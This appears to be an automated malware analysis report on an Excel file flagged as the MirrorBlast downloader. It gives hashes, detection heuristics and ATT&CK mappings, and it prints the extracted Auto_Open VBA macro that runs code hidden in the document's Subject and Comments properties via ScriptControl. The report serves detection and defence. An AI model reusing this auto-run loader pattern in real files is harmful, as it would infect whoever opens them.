Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 86ea7a3f1a8418c2…

MALICIOUS

Office (OLE)

Size: 65.5 KB
Created: 2021-08-17 12:24:08
Authoring application: Microsoft Excel
First seen: 2021-11-02
MD5: 0d7b2d491941b971c8e4e6a4ef740061
SHA-1: 6df177d7cd3f0225d2507ea5614eddf2fcb7358e
SHA-256: 86ea7a3f1a8418c27a6ccab58b933c6ecc595dd271db81819defb0f49d452c6d
Risk Score: 160

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The Excel file contains an Auto_Open VBA macro that leverages the ScriptControl object to execute code. The macro dynamically sets the script language based on the document's 'Subject' property and executes code embedded within the 'Comments' property. This is a common technique for downloading and executing further stages of malware, as indicated by the ClamAV detection for Xls.Downloader.MirrorBlast.

Heuristics (4)

  • MSScriptControl.ScriptControl — CVE-2015-0097 (severity: high; CVE likely; rule: CVE_2015_0097_SC)
  • ClamAV: Xls.Downloader.MirrorBlast-f8f807074fc98734-9955046-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Downloader.MirrorBlast-f8f807074fc98734-9955046-0
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Open macro (severity: high; rule: OLE_VBA_AUTO)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 862 bytes
SHA-256: 0278d22c57457c6ea65486c5e13f4b06bae683e9ef9fa360c905d1932da96848
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Function Auto_Open()
    Dim a As New ScriptControl
    a.Language = ActiveWorkbook.BuiltinDocumentProperties("Subject").Value
    a.AddCode (ActiveWorkbook.BuiltinDocumentProperties("Comments").Value)
End Function